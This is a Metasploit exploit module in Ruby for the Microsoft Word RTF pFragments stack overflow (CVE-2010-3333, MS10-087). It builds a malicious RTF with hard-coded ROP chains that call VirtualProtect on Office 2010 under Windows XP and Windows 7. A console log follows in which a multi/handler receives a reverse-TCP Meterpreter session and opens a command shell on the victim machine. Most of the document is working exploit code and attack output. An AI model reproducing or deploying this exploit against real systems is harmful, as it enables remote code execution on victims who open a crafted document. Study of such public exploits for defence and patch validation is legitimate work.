
Microsoft Word RTF pFragments Stack Buffer Overflow Vulnerability (CVE-2010-3333, MS10-087) — Metasploit file-format exploit module
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

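class Metasploit3 < Msf::Exploit::Remote
        Rank = GreatRanking

        include Msf::Exploit::FILEFORMAT

        # Layout of the crafted property value. The two filler runs bracket the
        # saved return address; the hex encoding of the second run is later
        # overwritten in place with raw upper-case letters (see #exploit).
        JUNK_LEN      = 20                       # bytes of filler on either side of the EIP overwrite
        PAYLOAD_SPACE = 512                      # bytes available for NOP sled + encoded payload
        SIZE_CHOICES  = [1, 3, 5, 6, 7].freeze   # allowed array element size / count values (see #sz_rand)

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
                        'Description'    => %q{
                                        This module exploits a stack-based buffer overflow in the handling of the
                                'pFragments' shape property within the Microsoft Word RTF parser. All versions
                                of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
                                MS10-087 bulletin are vulnerable.

                                The Office 2010 windows 7 target requires that the victim has winword.exe open
                                for a few seconds before they open the file. The file still can be double clicked
                                if winword.exe has been opened for the said time.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'wushi of team509',  # original discovery
                                        'unknown',           # exploit found in the wild
                                        'snake',             # public office 2010 poc
                                        'mr_me',             # msf
                                        'TecR0c'             # msf
                                ],
                        'Version'        => '$Revision: 12196 $',
                        'References'     =>
                                [
                                        [ 'CVE', '2010-3333' ],
                                        [ 'OSVDB', '69085' ],
                                        [ 'MSB', 'MS10-087' ],
                                        [ 'BID', '44652' ],
                                        [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ],
                                        [ 'URL', 'http://www.exploit-db.com/exploits/17474/' ] #tx snake
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        # Space is shared with the NOP sled built in #exploit, so the
                                        # two must agree -- both read PAYLOAD_SPACE.
                                        'Space'         => PAYLOAD_SPACE,
                                        'BadChars'      => "\x00",
                                        'DisableNops'   => true
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [

                                        # WINWORD.EXE v14.0.4762.1000
                                        # 'Ret' is the same "pop eax; retn" gadget the XP ROP chain uses.
                                        [ 'Microsoft Office 2010 SP0 English on Windows XP SP3 English',
                                                {
                                                        'Ret' => 0x4384fc83 # pop eax; retn [gfx.dll].
                                                }
                                        ],

                                        # WINWORD.EXE v14.0.4762.1000
                                        # 'Ret' is the same "pop ecx; retn" gadget the Win7 ROP chain uses.
                                        [ 'Microsoft Office 2010 SP0 English on Windows 7 SP0 English',
                                                {
                                                        'Ret' => 0x3f39a603 # pop ecx; retn [MSGR3EN.DLL].
                                                }
                                        ],

                                ],
                        'DisclosureDate' => 'Nov 09 2010',
                        'DefaultTarget' => 0))

                register_options(
                        [
                                OptString.new('FILENAME', [ true, 'The file name.',  'msf.rtf']),
                        ], self.class)
        end

        # Build the malicious RTF and write it to FILENAME.
        #
        # The pFragments property value is "<size>;<count>;" followed by
        # hex-encoded bytes: three 16-bit array parameters, then the stack
        # overwrite (filler, saved EIP pointing at a pop/retn gadget, filler,
        # ROP chain that reaches VirtualProtect() through PUSHAD, NOP sled,
        # encoded payload).
        def exploit
                # RTF property array parameters (element size / element count).
                el_size  = sz_rand()
                el_count = sz_rand()

                # Raises for a target with no chain instead of failing later with
                # an opaque TypeError when nil is appended to the buffer.
                gadgets = rop_chain_for_target

                # Array parameters handed to the parser. The original module notes
                # these are presumably used inconsistently (assert(amount1 <= amount2)
                # does not hold), which is what makes the copy overflow.
                data = ""
                data << [0xffff].pack('v') * 2
                data << [0x05ff].pack('v')

                # Stack overwrite: filler, saved EIP, filler, ROP chain, sled, payload.
                ret  = [target.ret].pack('V')
                rest = rand_text_alpha_upper(JUNK_LEN)
                rest << ret
                rest << rand_text_alpha_upper(JUNK_LEN)
                rest << gadgets
                # 'Payload' => 'Space' caps payload.encoded at PAYLOAD_SPACE bytes,
                # so the sled length is never negative.
                rest << make_nops(PAYLOAD_SPACE - payload.encoded.length)
                rest << payload.encoded

                # Craft the property value. The offset of the second filler run's
                # hex encoding is derived from what precedes it (header, then data,
                # first filler and ret -- each hex-encoded, so two characters per
                # byte) rather than hard-coded, so it stays correct if any of those
                # lengths change. With single-digit sizes this is offset 64.
                sploit    = "%d;%d;" % [el_size, el_count]
                upper_off = sploit.length + (data.length + JUNK_LEN + ret.length) * 2
                sploit << data.unpack('H*').first
                sploit << rest.unpack('H*').first
                sploit << "0"

                # Replace the hex digits of the second filler run with raw upper-case
                # letters. The original module only says "must be using uppercase";
                # why the parser needs non-hex characters at this position is not
                # documented -- confirm before changing.
                sploit[upper_off, JUNK_LEN * 2] = rand_text_alpha_upper(JUNK_LEN * 2)

                # Assemble it all into a nice RTF
                content  = "{\\rtf1"
                content << "{\\shp"             # shape
                content << "{\\sp"              # shape property
                content << "{\\sn pFragments}"  # property name
                content << "{\\sv #{sploit}}"   # property value
                content << "}}}"

                print_status("Creating '#{datastore['FILENAME']}' file ...")
                file_create(content)
        end

        # ROP chain for the current target, packed as little-endian DWORDs.
        #
        # Both chains set up a VirtualProtect() call through PUSHAD using gadgets
        # at hard-coded addresses in a DLL Office loads: MSGR3EN.DLL on Windows 7,
        # GFX.DLL on Windows XP (exact versions noted below). The first entry is
        # the IAT slot holding &VirtualProtect; the chain dereferences it into
        # ESI, builds the remaining registers, then PUSHAD makes the call.
        #
        # Raises ArgumentError for a target that has no chain.
        def rop_chain_for_target
                gadgets =
                        case target.name
                        when /on Windows 7 SP0 English/
                                # C:\Program Files\Microsoft Office\OFFICE14\PROOF\1033\MSGR3EN.DLL v3.1.0.15506
                                # loaded by default under windows 7 (not loaded at all under XP)
                                [
                                        0x3f101108,    # <- *&VirtualProtect()
                                        0x3f389ca5,    # MOV EAX,DWORD PTR DS:[ECX] # RETN (MSGR3EN.DLL)
                                        0x3f3094ef,    # XCHG EAX,ESI # RETN (MSGR3EN.DLL)
                                        0x3f3a1602,    # POP EBP # RETN (MSGR3EN.DLL)
                                        0x3f2c8964,    # ptr to 'jmp esp' (from MSGR3EN.DLL)
                                        0x3f39d705,    # POP EAX # RETN (MSGR3EN.DLL)
                                        0xfffffdff,    # value to negate, target value : 0x00000201, target reg : ebx
                                        0x3f38e9b7,    # NEG EAX # RETN (MSGR3EN.DLL)
                                        0x3f2e1725,    # XCHG EAX,EBX # RETN (MSGR3EN.DLL)
                                        0x3f39a603,    # POP ECX # RETN (MSGR3EN.DLL)
                                        0x3f3b0101,    # RW pointer (lpOldProtect) (-> ecx)
                                        0x3f3967f3,    # POP EDI # RETN (MSGR3EN.DLL)
                                        0x3f3967f4,    # ROP NOP (-> edi)
                                        0x3f39d705,    # POP EAX # RETN (MSGR3EN.DLL)
                                        0xffffffc0,    # value to negate, target value : 0x00000040, target reg : edx
                                        0x3f38e9b7,    # NEG EAX # RETN (MSGR3EN.DLL)
                                        0x3f2ef6bf,    # XCHG EAX,EDX # RETN (MSGR3EN.DLL)
                                        0x3f39d705,    # POP EAX # RETN (MSGR3EN.DLL)
                                        0x90909090,    # NOPS (-> eax)
                                        0x3f2ca585,    # PUSHAD # RETN (MSGR3EN.DLL)
                                ]
                        when /on Windows XP SP3 English/
                                # C:\Program Files\Microsoft Office\Office14\GFX.DLL v14.0.4750.1000
                                [
                                        0x437a10c4,    # <- *&VirtualProtect()
                                        0x43841201,    # MOV EAX,DWORD PTR DS:[EAX] # RETN (gfx.dll)
                                        0x437b018b,    # XCHG EAX,ESI # RETN (gfx.dll)
                                        0x438cc07d,    # POP EBP # RETN (gfx.dll)
                                        0x4383189c,    # ptr to 'jmp esp' (from gfx.dll)
                                        0x4384fc83,    # POP EAX # RETN (gfx.dll)
                                        0xfffffdff,    # value to negate, target value : 0x00000201, target reg : ebx
                                        0x43841430,    # NEG EAX # RETN (gfx.dll)
                                        0x437b03bb,    # XCHG EAX,EBX # RETN (gfx.dll)
                                        0x4390be09,    # POP ECX # RETN (gfx.dll)
                                        0x43916001,    # RW pointer (lpOldProtect) (-> ecx)
                                        0x4382d280,    # POP EDI # RETN (gfx.dll)
                                        0x4382d281,    # ROP NOP (-> edi)
                                        0x4384fc83,    # POP EAX # RETN (gfx.dll)
                                        0xffffffc0,    # value to negate, target value : 0x00000040, target reg : edx
                                        0x43841430,    # NEG EAX # RETN (gfx.dll)
                                        0x438ebaea,    # XCHG EAX,EDX # INC EBX # RETN (gfx.dll)
                                        0x4384fc83,    # POP EAX # RETN (gfx.dll)
                                        0x90909090,    # NOPS (-> eax)
                                        0x4382b783,    # PUSHAD # RETN (gfx.dll)
                                ]
                        else
                                raise ArgumentError, "no ROP chain defined for target '#{target.name}'"
                        end

                gadgets.pack("V*")
        end

        # Random element size / count for the property array: one of 1, 3, 5, 6
        # or 7, chosen uniformly. The original module drew from 0..8 and rejected
        # 0, 2, 4 and 8; why those values are unsuitable is not documented
        # (presumably the parser special-cases them -- confirm before widening
        # the set). Keeping every choice a single digit also keeps the
        # "<size>;<count>;" header a fixed width.
        def sz_rand
                SIZE_CHOICES[rand(SIZE_CHOICES.length)]
        end
end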
Example usage (handler side only). The module above is run first to generate the RTF (FILENAME, default msf.rtf) with a payload matching the handler, and the file is then opened by the victim in Word; only the multi/handler session that receives the callback is shown below. Note that RHOST, set in handle.rc, is not used by multi/handler.
[mr_me@neptune CVE-2010-3333]$ msfconsole -r handle.rc


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 772 exploits - 404 auxiliary - 118 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14294 updated yesterday (2011.11.21)

[*] Processing handle.rc for ERB directives.
resource (handle.rc)> use exploit/multi/handler
resource (handle.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (handle.rc)> set LHOST 192.168.114.1
LHOST => 192.168.114.1
resource (handle.rc)> set RHOST 192.168.114.130
RHOST => 192.168.114.130
resource (handle.rc)> set LPORT 4444
LPORT => 4444
resource (handle.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.114.1:4444
[*] Starting the payload handler...
msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.114.1
[*] Meterpreter session 1 opened (192.168.114.1:4444 -> 192.168.114.1:43696) at 2011-11-23 10:31:27 +1100

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : MS10-083-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 832 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ms10-083\Documents>whoami
whoami
ms10-083-pc\ms10-083

C:\Users\ms10-083\Documents>